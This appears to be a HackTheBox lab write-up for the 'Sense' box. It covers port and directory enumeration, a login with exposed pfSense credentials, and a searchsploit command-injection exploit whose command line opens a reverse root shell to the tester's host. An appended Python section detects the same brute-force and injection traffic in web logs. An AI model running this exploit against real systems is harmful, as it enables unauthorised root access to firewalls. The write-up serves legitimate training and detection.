HacktheBox - Sense Writeup

09/12/2019

Zero to OSCP Hero Writeup #17 - Sense

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.60

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that only ports 80 and 443 are open, with HTTP on port 80 redirecting to HTTPS on port 443.

2. Nmap Scan - All TCP Ports Scan

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.60

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.60

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 80/443 

1. Browse to https://10.10.10.60

So when we browse to 10.10.10.60 on port 80, we are redirected to port 443 and, as the name of the box suggests, we land on a pfSense firewall login page.

1.1 Trying Default Credentials 

After a quick google, I found that the default pfSense credentials are admin:pfsense, but these didn't work, nor did other basic combinations.

2. Gobuster 

Let's run a gobuster scan on the target to see if there are any hidden directories/files:

gobuster dir -k -u https://10.10.10.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt

  • dir: Search for directories 
  • -k: Dismiss any X509 certificate warnings 
  • -u: URL to scan
  • -w: Wordlist to use against the target 
  • -x: File Extensions to search for 

Okay, so Gobuster has found two interesting files: changelog.txt and system-users.txt:

So it seems that the pfSense firewall is out of date and vulnerable to a known exploit of some kind, but to exploit the firewall we first need to determine its version.

And we now have a valid logon! As we can see, the username is Rohit and the password is 'Company Defaults', which is pfsense.

3. Login to Firewall 

After logging in with the creds rohit:pfsense we find ourselves at the firewall dashboard. 

And as you can see, it gives us the key piece of information we require to find the exploit for the firewall: 

4. Searchsploit 

Let's see what searchsploit can find when we search for pfSense vulnerabilities:

searchsploit pfsense

A couple of exploits stick out as possibilities, as they allow us to run commands, which may give us a foothold on the machine. Let's take a look at the exploit that affects our version first: <2.1.4 Command Injection.

Foothold + Priv Esc - User + Root

5. pfSense <2.1.4 - status_rrd_graph_img.php Command Injection

Let's take a closer look at the exploit and see what we need to do to use it!

5.1 Mirror the exploit to our working dir 

searchsploit -m exploits/php/webapps/43560.py

5.2 View the exploit script 

nano 43560.py 

Okay, so we now know that this exploit will execute a reverse shell! 

Let's see the flags needed to use the exploit:

5.3 Execute the exploit 

As we already have the information needed to run the exploit, our exploit command should work:

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.59 --lport 9001 --username rohit --password pfsense

WooHoo! We are on the machine as Root! :) 
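From the defender's side, both steps of this box leave a clear trail in the web server log: the gobuster run (a burst of 404s from one client followed by a 200 on system-users.txt) and the exploit request to status_rrd_graph_img.php with shell metacharacters in its query string. The following Python is an added example, not part of the original write-up or of pfSense; the log lines, IPs, timestamps and user agents are constructed, and the detection thresholds and the metacharacter check are my own assumptions rather than any official signature.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample lines in combined log format (made up for this example): a short
# brute-force, a read of system-users.txt, an RRD graph request with a shell metacharacter.
SAMPLE_LOG = """\
10.10.14.59 - - [09/Dec/2019:10:00:01 +0000] "GET /images HTTP/1.1" 404 512 "-" "gobuster/3.0"
10.10.14.59 - - [09/Dec/2019:10:00:01 +0000] "GET /admin HTTP/1.1" 404 512 "-" "gobuster/3.0"
10.10.14.59 - - [09/Dec/2019:10:00:02 +0000] "GET /backup HTTP/1.1" 404 512 "-" "gobuster/3.0"
10.10.14.59 - - [09/Dec/2019:10:00:03 +0000] "GET /system-users.txt HTTP/1.1" 200 106 "-" "gobuster/3.0"
10.10.14.59 - - [09/Dec/2019:10:05:10 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bid HTTP/1.1" 200 0 "-" "python-requests/2.22"
10.10.14.7 - - [09/Dec/2019:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 7311 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SENSITIVE_FILES = {"/system-users.txt", "/changelog.txt"}   # files the write-up found exposed
SHELL_META = re.compile(r"[;|`&]|\$\(")                     # crude command-injection indicator (assumption)

def parse(line):
    # Return the line's fields as a dict, or None if it is not a combined-format line
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_alerts(log_text, brute_threshold=3, window_seconds=60):
    # Return a sorted list of (client_ip, alert_name) pairs for the three signals
    alerts = set()
    not_found = defaultdict(list)   # ip -> timestamps of 404s inside the sliding window
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        path, _, query = rec["path"].partition("?")
        path, query = unquote(path), unquote(query)
        if path in SENSITIVE_FILES and rec["status"] == 200:
            alerts.add((rec["ip"], "sensitive-file-read"))
        if path.endswith("/status_rrd_graph_img.php") and SHELL_META.search(query):
            alerts.add((rec["ip"], "rrd-graph-command-injection"))
        if rec["status"] == 404:
            recent = [t for t in not_found[rec["ip"]] if (rec["ts"] - t).total_seconds() <= window_seconds]
            not_found[rec["ip"]] = recent + [rec["ts"]]
            if len(not_found[rec["ip"]]) >= brute_threshold:
                alerts.add((rec["ip"], "directory-bruteforce"))
    return sorted(alerts)
```

Running find_alerts(SAMPLE_LOG) flags all three signals for 10.10.14.59 and nothing for the benign client.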

6. Gather User and Root flags 

As we are root, we can grab both the user and root.txt flags! :) 

user.txt:

root.txt:

Conclusion

A rather simple box that highlights the importance of enumerating hidden files and directories! 

Thanks for reading! Next up is Box #18 - Silo!